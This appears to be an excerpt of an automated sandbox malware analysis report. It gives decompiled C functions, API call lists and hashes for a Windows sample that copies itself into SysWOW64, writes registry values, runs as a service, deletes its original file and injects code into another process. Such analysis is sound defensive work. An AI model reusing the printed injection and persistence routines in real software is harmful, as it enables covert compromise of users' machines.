                                                                                0x00409df5
                                                                                0x00409e0c
                                                                                0x00409e11
                                                                                0x00409e16
                                                                                0x00409e1c
                                                                                0x00409e2e
                                                                                0x00409e2e
                                                                                0x00409e38
                                                                                0x00000000
                                                                                0x00409e38
                                                                                0x00409df9
                                                                                0x00409dfd
                                                                                0x00409dff
                                                                                0x00409dff
                                                                                0x00409e04
                                                                                0x00000000
                                                                                0x00409e04
                                                                                0x00409d1d
                                                                                0x00409d1d
                                                                                0x00409d23
                                                                                0x00409d2a
                                                                                0x00409d2d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409d2d
                                                                                0x00000000
                                                                                0x00409d23
                                                                                0x00409d1b
                                                                                0x00409cec
                                                                                0x00409c81
                                                                                0x00409c3f
                                                                                0x00409b47
                                                                                0x00409b4a
                                                                                0x00409b4d
                                                                                0x00409b56
                                                                                0x00409b8b
                                                                                0x00409b91
                                                                                0x00409b92
                                                                                0x00409b94
                                                                                0x00409b9f
                                                                                0x00409b9f
                                                                                0x00409b9f
                                                                                0x00409ba4
                                                                                0x00409ba4
                                                                                0x00409bb3
                                                                                0x00409bb8
                                                                                0x00409bbf
                                                                                0x00409bbf
                                                                                0x00409bc2
                                                                                0x00409bc8
                                                                                0x00409bde
                                                                                0x00409be3
                                                                                0x00409be8
                                                                                0x00409bfa
                                                                                0x00409bff
                                                                                0x00409c02
                                                                                0x00409c02
                                                                                0x00409be8
                                                                                0x00000000
                                                                                0x00409bc8
                                                                                0x00409b58
                                                                                0x00409b5e
                                                                                0x00409b64
                                                                                0x00409b67
                                                                                0x00000000
                                                                                0x00409b69
                                                                                0x00409b6b
                                                                                0x00409b7a
                                                                                0x00409b7f
                                                                                0x00000000
                                                                                0x00409b7f
                                                                                0x00409b67

                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
                                                                                • SetErrorMode.KERNELBASE(00000003), ref: 00409A83
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00406511), ref: 00409A8A
                                                                                  • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                  • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                  • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
                                                                                • GetCommandLineA.KERNEL32 ref: 00409AFD
                                                                                • lstrlenA.KERNEL32(?), ref: 00409B99
                                                                                • ExitProcess.KERNEL32 ref: 00409C06
                                                                                • GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
                                                                                • lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
                                                                                • lstrcatA.KERNEL32(?,?), ref: 00409D8B
                                                                                • lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
                                                                                • DeleteFileA.KERNEL32(00000022), ref: 00409E38
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
                                                                                • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
                                                                                • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
                                                                                • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
                                                                                • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
                                                                                • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
                                                                                • lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
                                                                                • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
                                                                                • wsprintfA.USER32 ref: 0040A0B6
                                                                                • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
                                                                                • lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
                                                                                • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
                                                                                • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
                                                                                • GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
                                                                                • GetCommandLineA.KERNEL32 ref: 0040A1E5
                                                                                  • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,004122F8,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                  • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                  • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                • lstrlenA.KERNEL32(?), ref: 0040A288
                                                                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
                                                                                • GetLastError.KERNEL32 ref: 0040A3ED
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040A400
                                                                                • DeleteFileA.KERNEL32(C:\Users\user\Desktop\file.exe), ref: 0040A407
                                                                                • CreateThread.KERNEL32 ref: 0040A42C
                                                                                • WSAStartup.WS2_32(00001010,?), ref: 0040A43A
                                                                                • CreateThread.KERNEL32 ref: 0040A469
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040A48A
                                                                                • GetTickCount.KERNEL32 ref: 0040A49F
                                                                                • GetTickCount.KERNEL32 ref: 0040A4B7
                                                                                • Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                • String ID: "$"$"$%X%08X$C:\Users\user\Desktop\file.exe$C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$D$P$\$htdzdeug
                                                                                • API String ID: 2089075347-1142321554
                                                                                • Opcode ID: dd92c2d398ffab15ef98c822b30add3de372c5a293a501ef1d9825a70cf67c33
                                                                                • Instruction ID: 2e8e4d28fd33f050895bc00b790e6664de298002562c0b6b0b892c26365fcd94
                                                                                • Opcode Fuzzy Hash: dd92c2d398ffab15ef98c822b30add3de372c5a293a501ef1d9825a70cf67c33
                                                                                • Instruction Fuzzy Hash: E95291B1D40259BBDB11DBA1CC49EEF7BBCAB04304F1444BBF509F6182D6788E948B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040637C Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 486 40637c-406384 487 406386-406389 486->487 488 40638a-4063b4 GetModuleHandleA VirtualAlloc 486->488 489 4063f5-4063f7 488->489 490 4063b6-4063d4 call 40ee08 VirtualAllocEx 488->490 492 40640b-40640f 489->492 490->489 494 4063d6-4063f3 call 4062b7 WriteProcessMemory 490->494 494->489 497 4063f9-40640a 494->497 497->492
                                                                                C-Code - Quality: 100%
                                                                                			E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
				void* _v8;
				void* _t15;
				void* _t16;
				void* _t18;
				int _t20;
				long _t26;
				struct HINSTANCE__* _t32;
				void* _t37;

				if(_a8 != 0) {
					_t32 = GetModuleHandleA(0);
					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
					_t15 = VirtualAlloc(0, _t26, 0x1000, 4); // executed
					_v8 = _t15;
					if(_t15 == 0) {
						L5:
						_t16 = 0;
					} else {
						E0040EE08(_t15, _t32, _t26);
						_t18 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40); // executed
						_t37 = _t18;
						if(_t37 == 0) {
							goto L5;
						} else {
							E004062B7(_v8, _t37);
							_t20 = WriteProcessMemory(_a8, _t37, _v8, _t26, 0); // executed
							if(_t20 != 0) {
								 *_a16 = _t37;
								 *_a12 = _t37 - _t32 + _a4;
								_t16 = 1;
							} else {
								goto L5;
							}
						}
					}
					return _t16;
				} else {
					return 0;
				}
			}











                                                                                0x00406384
                                                                                0x00406395
                                                                                0x0040639a
                                                                                0x004063a9
                                                                                0x004063af
                                                                                0x004063b4
                                                                                0x004063f5
                                                                                0x004063f5
                                                                                0x004063b6
                                                                                0x004063b9
                                                                                0x004063ca
                                                                                0x004063d0
                                                                                0x004063d4
                                                                                0x00000000
                                                                                0x004063d6
                                                                                0x004063da
                                                                                0x004063eb
                                                                                0x004063f3
                                                                                0x004063fc
                                                                                0x00406406
                                                                                0x0040640a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063f3
                                                                                0x004063d4
                                                                                0x0040640f
                                                                                0x00406386
                                                                                0x00406389
                                                                                0x00406389

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
                                                                                • VirtualAllocEx.KERNELBASE(00000000,00000000,?,00001000,00000040), ref: 004063CA
                                                                                • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 004063EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 1965334864-0
                                                                                • Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                • Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
                                                                                • Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                • Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004073FF Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 345registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 264 4073ff-407419 265 40741b 264->265 266 40741d-407422 264->266 265->266 267 407424 266->267 268 407426-40742b 266->268 267->268 269 407430-407435 268->269 270 40742d 268->270 271 407437 269->271 272 40743a-407481 call 406dc2 call 402544 RegOpenKeyExA 269->272 270->269 271->272 277 407487-40749d call 40ee2a 272->277 278 4077f9-4077fe call 40ee2a 272->278 283 407703-40770e RegEnumKeyA 277->283 284 407801 278->284 285 4074a2-4074b1 call 406cad 283->285 286 407714-40771d RegCloseKey 283->286 287 407804-407808 284->287 290 4074b7-4074cc call 40f1a5 285->290 291 4076ed-407700 285->291 286->284 290->291 294 4074d2-4074f8 RegOpenKeyExA 290->294 291->283 295 407727-40772a 294->295 296 4074fe-407530 call 402544 RegQueryValueExA 294->296 297 407755-407764 call 40ee2a 295->297 298 40772c-407740 call 40ef00 295->298 296->295 305 407536-40753c 296->305 306 4076df-4076e2 297->306 307 407742-407745 RegCloseKey 298->307 308 40774b-40774e 298->308 309 40753f-407544 305->309 306->291 310 4076e4-4076e7 RegCloseKey 306->310 307->308 312 4077ec-4077f7 RegCloseKey 308->312 309->309 311 407546-40754b 309->311 310->291 311->297 313 407551-40756b call 40ee95 311->313 312->287 313->297 316 407571-407593 call 402544 call 40ee95 313->316 321 407753 316->321 322 407599-4075a0 316->322 321->297 323 4075a2-4075c6 call 40ef00 call 40ed03 322->323 324 4075c8-4075d7 call 40ed03 322->324 330 4075d8-4075da 323->330 324->330 331 4075dc 330->331 332 4075df-407623 call 40ee95 call 402544 call 40ee95 call 40ee2a 330->332 331->332 342 407626-40762b 332->342 342->342 343 40762d-407634 342->343 344 407637-40763c 343->344 344->344 345 40763e-407642 344->345 346 407644-407656 call 40ed77 345->346 347 40765c-407673 call 40ed23 345->347 346->347 352 407769-40777c call 40ef00 346->352 353 407680 347->353 354 407675-40767e 347->354 359 4077e3-4077e6 RegCloseKey 352->359 356 407683-40768e call 406cad 353->356 354->356 361 407722-407725 356->361 362 407694-4076bf call 40f1a5 call 406c96 356->362 359->312 363 4076dd 361->363 368 4076c1-4076c7 362->368 369 4076d8 362->369 363->306 368->369 370 4076c9-4076d2 368->370 369->363 370->369 371 40777e-407797 GetFileAttributesExA 370->371 372 407799 371->372 373 40779a-40779f 371->373 372->373 374 4077a1 373->374 375 4077a3-4077a8 373->375 374->375 376 4077c4-4077c8 375->376 377 4077aa-4077c0 call 40ee08 375->377 379 4077d7-4077dc 376->379 380 4077ca-4077d6 call 40ef00 376->380 377->376 381 4077e0-4077e2 379->381 382 4077de 379->382 380->379 381->359 382->381
                                                                                C-Code - Quality: 76%
                                                                                			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				intOrPtr _t89;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0; // executed
				}
				_t89 = E00406DC2(_t165); // executed
				_v32 = _t89;
				_t160 = 0xe4;
				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x4122f8);
				if(_t92 != 0) {
					_t93 = E0040EE2A(_t165);
					goto L66;
				} else {
					E0040EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E00406CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0040F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x61616161) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12); // executed
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0040EE2A(_t167, 0x4122f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							E0040EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16); // executed
						if(_t107 != _t188) {
							goto L45;
						}
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						_t123 = E0040EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						if(_v296 != 0x22) {
							_t127 = E0040ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0040EF00( &_v296,  &_v295);
							_t127 = E0040ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0040EE95( &_v296,  &_v556);
						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0040ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E00406CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0040F1A5(_v8) ^ 0x61616161;
								_t163 = _t194 >> 0x00000008 & 0x000000ff;
								 *_v28 = 0x2e;
								if(E00406C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0040EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0040EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0040EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12); // executed
							goto L64;
						}
					}
					_t93 = RegCloseKey(_v20);
					L66:
					return _t93 | 0xffffffff;
				}
			}























































                                                                                0x004073ff
                                                                                0x00407408
                                                                                0x0040740e
                                                                                0x00407410
                                                                                0x00407419
                                                                                0x0040741b
                                                                                0x0040741b
                                                                                0x0040741d
                                                                                0x00407422
                                                                                0x00407424
                                                                                0x00407424
                                                                                0x00407426
                                                                                0x0040742b
                                                                                0x0040742d
                                                                                0x0040742d
                                                                                0x00407430
                                                                                0x00407435
                                                                                0x00407437
                                                                                0x00407437
                                                                                0x0040743a
                                                                                0x0040743f
                                                                                0x00407451
                                                                                0x00407464
                                                                                0x00407469
                                                                                0x00407472
                                                                                0x00407478
                                                                                0x0040747d
                                                                                0x0040747e
                                                                                0x00407481
                                                                                0x004077f9
                                                                                0x00000000
                                                                                0x00407487
                                                                                0x00407487
                                                                                0x0040748c
                                                                                0x0040748f
                                                                                0x00407498
                                                                                0x00407499
                                                                                0x0040749c
                                                                                0x00407703
                                                                                0x00407706
                                                                                0x0040770e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004074b1
                                                                                0x004076ed
                                                                                0x004076ed
                                                                                0x004076f5
                                                                                0x004076f6
                                                                                0x004076ff
                                                                                0x00407700
                                                                                0x00000000
                                                                                0x00407700
                                                                                0x004074be
                                                                                0x004074c8
                                                                                0x004074cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004074e6
                                                                                0x004074e9
                                                                                0x004074f0
                                                                                0x004074f8
                                                                                0x00407727
                                                                                0x0040772a
                                                                                0x00407755
                                                                                0x0040775c
                                                                                0x00407761
                                                                                0x004076df
                                                                                0x004076e2
                                                                                0x004076e7
                                                                                0x004076e7
                                                                                0x00000000
                                                                                0x004076e2
                                                                                0x00407736
                                                                                0x00407740
                                                                                0x00407745
                                                                                0x00407745
                                                                                0x0040774b
                                                                                0x0040774d
                                                                                0x004077ec
                                                                                0x004077ef
                                                                                0x00000000
                                                                                0x004077f5
                                                                                0x0040751c
                                                                                0x00407521
                                                                                0x00407528
                                                                                0x00407530
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407536
                                                                                0x0040753c
                                                                                0x0040753f
                                                                                0x0040753f
                                                                                0x00407541
                                                                                0x00407542
                                                                                0x0040754b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040755f
                                                                                0x00407565
                                                                                0x00407566
                                                                                0x0040756b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407589
                                                                                0x0040758e
                                                                                0x00407593
                                                                                0x00407753
                                                                                0x00000000
                                                                                0x00407753
                                                                                0x004075a0
                                                                                0x004075d1
                                                                                0x004075d7
                                                                                0x004075a2
                                                                                0x004075b0
                                                                                0x004075be
                                                                                0x004075c3
                                                                                0x004075c3
                                                                                0x004075da
                                                                                0x004075dc
                                                                                0x004075dc
                                                                                0x004075fc
                                                                                0x00407615
                                                                                0x00407618
                                                                                0x0040761d
                                                                                0x00407620
                                                                                0x00407623
                                                                                0x00407626
                                                                                0x00407626
                                                                                0x00407628
                                                                                0x00407629
                                                                                0x0040762d
                                                                                0x00407632
                                                                                0x00407634
                                                                                0x00407634
                                                                                0x00407637
                                                                                0x00407637
                                                                                0x00407639
                                                                                0x0040763a
                                                                                0x0040763e
                                                                                0x00407642
                                                                                0x0040765c
                                                                                0x00407664
                                                                                0x00407667
                                                                                0x0040766e
                                                                                0x00407673
                                                                                0x00407680
                                                                                0x00407675
                                                                                0x0040767b
                                                                                0x0040767b
                                                                                0x0040768e
                                                                                0x00407722
                                                                                0x00000000
                                                                                0x00407694
                                                                                0x004076a1
                                                                                0x004076ad
                                                                                0x004076b3
                                                                                0x004076bf
                                                                                0x004076d8
                                                                                0x004076d8
                                                                                0x004076dd
                                                                                0x004076dd
                                                                                0x00000000
                                                                                0x004076dd
                                                                                0x004076c1
                                                                                0x004076c7
                                                                                0x00000000
                                                                                0x0040777e
                                                                                0x00407785
                                                                                0x00407797
                                                                                0x00407799
                                                                                0x00407799
                                                                                0x0040779a
                                                                                0x0040779f
                                                                                0x004077a1
                                                                                0x004077a1
                                                                                0x004077a3
                                                                                0x004077a8
                                                                                0x004077b3
                                                                                0x004077b8
                                                                                0x004077c0
                                                                                0x004077c0
                                                                                0x004077c8
                                                                                0x004077d0
                                                                                0x004077d6
                                                                                0x004077d7
                                                                                0x004077dc
                                                                                0x004077de
                                                                                0x004077de
                                                                                0x004077e0
                                                                                0x004077e2
                                                                                0x00000000
                                                                                0x004077e2
                                                                                0x004076c7
                                                                                0x00407769
                                                                                0x00407773
                                                                                0x004077e3
                                                                                0x004077e6
                                                                                0x00000000
                                                                                0x004077e6
                                                                                0x00407642
                                                                                0x00407717
                                                                                0x00407801
                                                                                0x00000000
                                                                                0x00407801

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,74CB43E0,00000000), ref: 00407472
                                                                                • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000101,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 004074F0
                                                                                • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407528
                                                                                • ___ascii_stricmp.LIBCMT ref: 0040764D
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 004076E7
                                                                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407717
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407745
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 004077EF
                                                                                  • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
                                                                                • RegCloseKey.KERNELBASE(?), ref: 004077E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                • String ID: "
                                                                                • API String ID: 3433985886-123907689
                                                                                • Opcode ID: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
                                                                                • Instruction ID: 7fe5a339a68ccf6b09c70fd716338511db9c3a0a85de510e5ec7ef93542d7acc
                                                                                • Opcode Fuzzy Hash: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
                                                                                • Instruction Fuzzy Hash: 10C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1044B7F504B72D1EA78AE908B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
